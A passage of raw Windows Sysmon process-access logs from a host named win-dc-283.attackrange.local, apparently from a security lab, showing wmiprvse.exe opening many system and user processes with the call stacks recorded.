16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.099{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 